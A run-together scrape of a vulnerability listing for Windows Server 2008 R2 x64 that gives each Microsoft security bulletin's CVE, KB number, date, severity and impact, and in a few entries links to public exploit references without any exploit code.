Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120612CVE: CVE-2012-0173KB: KB2685939Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0176KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0176KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0176KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120710CVE: CVE-2012-0175KB: KB2691442Title: Vulnerability in Windows Shell Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120612CVE: CVE-2012-1515KB: KB2709715Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121211CVE: CVE-2012-4774KB: KB2758857Title: Vulnerability in Windows File Handling Component Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20121113CVE: CVE-2012-4776KB: KB2729451Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20121113CVE: CVE-2012-4777KB: KB2729451Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100713CVE: CVE-2009-3678KB: KB2032276Title: Vulnerability in Canonical Display Driver Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20121009CVE: CVE-2012-2551KB: KB2743555Title: Vulnerability in Kerberos Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20121211CVE: CVE-2012-2556KB: KB2753842Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20081111CVE: CVE-2008-4029KB: KB954430Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 4.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110209CVE: SPSRV8R2X64SP1KB: KBSPSRV8R2X64SP1Title: Windows Server 2008 R2 for x64-based Systems Service Pack 1Affected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: No more updatesExploit: n/a, Date: 20120508CVE: CVE-2012-1848KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-1848KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-1848KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100511CVE: CVE-2010-0816KB: KB978542Title: Vulnerability in Outlook Express and Windows Mail Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Live Mail 2011Severity: CriticalImpact: Remote Code ExecutionExploits: http://archives.neohapsis.com/archives/bugtraq/2010-05/0068.html, http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=13&Itemid=13, http://www.securityfocus.com/bid/40052, Date: 20130212CVE: CVE-2013-0073KB: KB2789644Title: Vulnerability in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130212CVE: CVE-2013-0075KB: KB2790655Title: Vulnerability in TCP/IP Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130212CVE: CVE-2013-0076KB: KB2790113Title: Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20120214CVE: CVE-2012-0148KB: KB2645640Title: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20101012CVE: CVE-2010-1263KB: KB979687Title: Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: WordPadSeverity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-1263KB: KB979688Title: Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows ShellSeverity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-2745KB: KB2378111Title: Vulnerability in Windows Media Player Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Media Player 12Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-2746KB: KB2296011Title: Vulnerability in Windows Common Control Library Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20101214CVE: CVE-2010-2742KB: KB2207559Title: Vulnerability in Windows Netlogon Service Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20100209CVE: CVE-2010-0026KB: KB977894Title: Vulnerability in Windows Server 2008 Hyper-V Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20100413CVE: CVE-2010-0024KB: KB976323Title: Vulnerabilities in Microsoft Exchange and Windows SMTP Service Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20100413CVE: CVE-2010-0025KB: KB976323Title: Vulnerabilities in Microsoft Exchange and Windows SMTP Service Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20120814CVE: CVE-2012-1852KB: KB2712808Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1852KB: KB2705219Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1853KB: KB2712808Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1853KB: KB2705219Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1850KB: KB2712808Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1850KB: KB2705219Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1851KB: KB2712808Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-1851KB: KB2705219Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-3223KB: KB2294255Title: Vulnerability in Windows Shared Cluster Disks Could Allow TamperingAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ModerateImpact: TamperingExploit: n/a, Date: 20101012CVE: CVE-2010-3227KB: KB2387149Title: Vulnerability in Microsoft Foundation Classes Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ModerateImpact: Remote Code ExecutionExploit: http://www.exploit-db.com/exploits/13921/, Date: 20120214CVE: CVE-2012-0150KB: KB2654428Title: Vulnerability in C Run-Time Library Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120412CVE: CVE-2012-0151KB: KB2653956Title: Vulnerability in Windows Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120313CVE: CVE-2012-0152KB: KB2667402Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120313CVE: CVE-2012-0152KB: KB2621440Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0159KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0159KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0159KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120110CVE: CVE-2012-0013KB: KB2584146Title: Vulnerability in Microsoft Windows Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0008KB: KB2778930Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: http://www.exploit-db.com/exploits/24485, Date: 20130108CVE: CVE-2013-0005KB: KB2736418Title: Vulnerability in Open Data Protocol Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130108CVE: CVE-2013-0004KB: KB2742598Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0004KB: KB2756920Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0007KB: KB2758694Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 4.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0007KB: KB2757638Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 3.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0007KB: KB2757638Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 6.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0006KB: KB2758694Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 4.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0006KB: KB2757638Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 3.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0006KB: KB2757638Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 6.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0001KB: KB2742598Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0001KB: KB2756920Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121211CVE: CVE-2012-4786KB: KB2753842Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0002KB: KB2742598Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0002KB: KB2756920Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20100810CVE: CVE-2010-2555KB: KB982799Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20100112CVE: CVE-2010-0018KB: KB972270Title: Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20111011CVE: CVE-2011-1247KB: KB2564958Title: Vulnerability in Microsoft Active Accessibility Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-1284KB: KB2813170Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130312CVE: CVE-2013-1285KB: KB2807986Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130312CVE: CVE-2013-1286KB: KB2807986Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130312CVE: CVE-2013-1287KB: KB2807986Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130212CVE: CVE-2013-1281KB: KB2790978Title: Vulnerability in NFS Server Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130409CVE: CVE-2013-1282KB: KB2772930Title: Vulnerability in Active Directory Could Lead to Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Active Directory ServicesSeverity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130409CVE: CVE-2013-1282KB: KB2772930Title: Vulnerability in Active Directory Could Lead to Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Active Directory Lightweight Directory ServicesSeverity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130409CVE: CVE-2013-1283KB: KB2840149Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1283KB: KB2808735Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110208CVE: CVE-2011-0043KB: KB2425227Title: Vulnerabilities in Kerberos Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110308CVE: CVE-2011-0042KB: KB2479943Title: Vulnerabilities in Windows Media Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110208CVE: CVE-2011-0045KB: KB2393802Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20120313CVE: CVE-2012-0002KB: KB2667402Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120313CVE: CVE-2012-0002KB: KB2621440Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120110CVE: CVE-2012-0003KB: KB2631813Title: Vulnerabilities in Windows Media Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: DirectShowSeverity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120110CVE: CVE-2012-0001KB: KB2644615Title: Vulnerability in Windows Kernel Could Allow Security Feature BypassAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Security Feature BypassExploit: n/a, Date: 20120313CVE: CVE-2012-0006KB: KB2647170Title: Vulnerability in DNS Server Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20120214CVE: CVE-2010-5082KB: KB2643719Title: Vulnerability in Color Control Panel Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120110CVE: CVE-2012-0004KB: KB2631813Title: Vulnerabilities in Windows Media Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: DirectShowSeverity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-1883KB: KB982132Title: Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100608CVE: CVE-2010-1880KB: KB979482Title: Vulnerabilities in Media Decompression Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Asycfilt.dll (COM component)Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100608CVE: CVE-2010-1256KB: KB982666Title: Vulnerability in Internet Information Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0013KB: KB2785220Title: Vulnerability in Microsoft Windows Could Allow Security Feature BypassAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Security Feature BypassExploit: n/a, Date: 20100413CVE: CVE-2010-0486KB: KB979309Title: Vulnerabilities in Windows Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Cabinet File Viewer Shell Extension 6.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0011KB: KB2769369Title: Vulnerability in Windows Print Spooler Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120710CVE: CVE-2012-1870KB: KB2655992Title: Vulnerability in TLS Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Information DisclosureExploit: n/a, Date: 20101214CVE: CVE-2010-3961KB: KB2442962Title: Vulnerability in Consent User Interface Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20100209CVE: CVE-2010-0250KB: KB975560Title: Vulnerability in Microsoft DirectShow Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft DirectXSeverity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101214CVE: CVE-2010-3966KB: KB2385678Title: Vulnerability in Microsoft Windows Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-2731KB: KB2124261Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-2731KB: KB2271195Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20100413CVE: CVE-2010-0487KB: KB979309Title: Vulnerabilities in Windows Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Cabinet File Viewer Shell Extension 6.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120710CVE: CVE-2012-1891KB: KB2698365Title: Vulnerability in Microsoft Data Access Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Data Access Components 6.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20121113CVE: CVE-2012-1896KB: KB2729451Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-1899KB: KB2124261Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-1899KB: KB2271195Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20121113CVE: CVE-2012-1895KB: KB2729451Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110809CVE: CVE-2011-1975KB: KB2560656Title: Vulnerability in Data Access Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20110809CVE: CVE-2011-1977KB: KB2487367Title: Vulnerability in Microsoft Chart Control Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 4Severity: ImportantImpact: Information DisclosureExploit: n/a, Date: 20110208CVE: CVE-2010-4398KB: KB2393802Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/, Date: 20111229CVE: CVE-2011-3414KB: KB2656355Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Elevation of PrivilegeExploit: n/a, Date: 20111229CVE: CVE-2011-3417KB: KB2656355Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Elevation of PrivilegeExploit: n/a, Date: 20111229CVE: CVE-2011-3416KB: KB2656355Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Elevation of PrivilegeExploit: n/a, Date: 20110712CVE: CVE-2011-1870KB: KB2507938Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110614CVE: CVE-2011-1872KB: KB2525835Title: Vulnerability in Hyper-V Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20120508CVE: CVE-2012-0178KB: KB2690533Title: Vulnerability in Windows Partition Manager Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110614CVE: CVE-2011-1268KB: KB2536276Title: Vulnerability in SMB Client Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20111213CVE: CVE-2011-3397KB: KB2618451Title: Cumulative Security Update of ActiveX Kill BitsAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: 